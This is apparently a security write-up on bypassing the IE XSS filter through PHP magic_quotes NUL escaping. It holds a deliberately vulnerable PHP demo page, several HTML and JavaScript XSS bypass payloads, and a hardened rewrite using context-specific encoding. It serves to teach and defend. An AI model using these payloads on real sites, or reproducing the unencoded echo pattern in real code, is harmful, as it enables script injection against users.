In some web containers, certain special characters are converted on the server side. Wherever the IE XSS filter's developers overlooked such a conversion, the filter can be bypassed.
In PHP, when the "magic quotes" feature is enabled (magic_quotes_gpc = On), the characters ' (single quote), " (double quote), \ (backslash) and NUL are escaped with a backslash (%00 => \0).
1. xss.php demo source code (deliberately vulnerable; both parameters are echoed without encoding):
<?php echo $_GET['x']; ?>
<script type="text/javascript">
var x = "<?php echo $_GET['z']; ?>";
</script>
2. HTML bypass cases:
<script>alert(1)</script>
<script/%00%00%00%00>alert(1)</script>
%00%00v%00%00<script>alert(1)</script>
<script/%00%00v%00%00>alert(1)</script>
Tips:
1. The bypass characters must be placed where the interception rule expects them. For example, <script> can become <script[here]>.
3. JavaScript bypass cases:
";alert(1)//
%C0";alert(%00)//
%C0";//(%0dalert(1)//
%C0";//(%00%0dalert(1)//
%C0"//(%000000%0dalert(1)//
Tips:
1. The backslash inserted by magic quotes has to be swallowed.
2. //(%000000%0d is used to get past the interception rule for function calls.
Solution:
Add the %00 => \0 rule to the filter's canonicalization. Of course, this may cause other problems.
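Whatever rule the browser filter ends up with, the demo page itself can be fixed at the source, and that fix does not depend on the filter at all. The following hardened rewrite of xss.php is an added example, not code from the original post; it keeps the two injection points from the demo (parameter names x and z are taken from the demo above) but encodes each value for its exact output context, HTML body and JavaScript string literal, and declares the response charset so that the NUL and %C0 tricks above no longer yield executable script. It assumes PHP 7.2 or later for the JSON_INVALID_UTF8_SUBSTITUTE flag.

```php
<?php
// Added example: hardened rewrite of the demo xss.php (not part of the original post).
// Parameter names x and z are assumed from the demo. Requires PHP >= 7.2.

// Declare the charset explicitly. Without it the browser may guess a legacy
// multi-byte encoding in which a stray lead byte such as 0xC0 absorbs the
// following byte, e.g. the escaping backslash.
header('Content-Type: text/html; charset=UTF-8');

// Encode for the HTML body context.
function html_encode(string $s): string
{
    // NUL bytes are never legitimate in user text and are the raw material of
    // the bypasses above, so drop them before encoding.
    $s = str_replace("\0", '', $s);
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences (such as a lone 0xC0) with U+FFFD instead of returning ''.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode for the JavaScript string-literal context. Emits the quotes itself,
// so the template must not wrap the result in its own quotes.
function js_string_encode(string $s): string
{
    $s = str_replace("\0", '', $s);
    // JSON_HEX_* turn < > & ' " into \uXXXX escapes, so the literal can neither
    // close the surrounding quotes nor terminate the <script> element.
    // JSON_INVALID_UTF8_SUBSTITUTE keeps json_encode from returning false on
    // invalid input like %C0.
    $encoded = json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE
    );
    // Defensive fallback: if encoding still fails, emit an empty literal.
    return $encoded === false ? '""' : $encoded;
}

// Read the parameters as strings; never trust magic_quotes_gpc (removed in PHP 5.4)
// to do any escaping for you.
$x = isset($_GET['x']) ? (string) $_GET['x'] : '';
$z = isset($_GET['z']) ? (string) $_GET['z'] : '';
?>
<?php echo html_encode($x); ?>
<script type="text/javascript">
var x = <?php echo js_string_encode($z); ?>;
</script>
```

The design point is that each sink gets its own encoder: htmlspecialchars is correct for the body but not for a JavaScript string, where json_encode with the JSON_HEX_* flags produces a literal that is safe inside a <script> block regardless of which bytes the request contained.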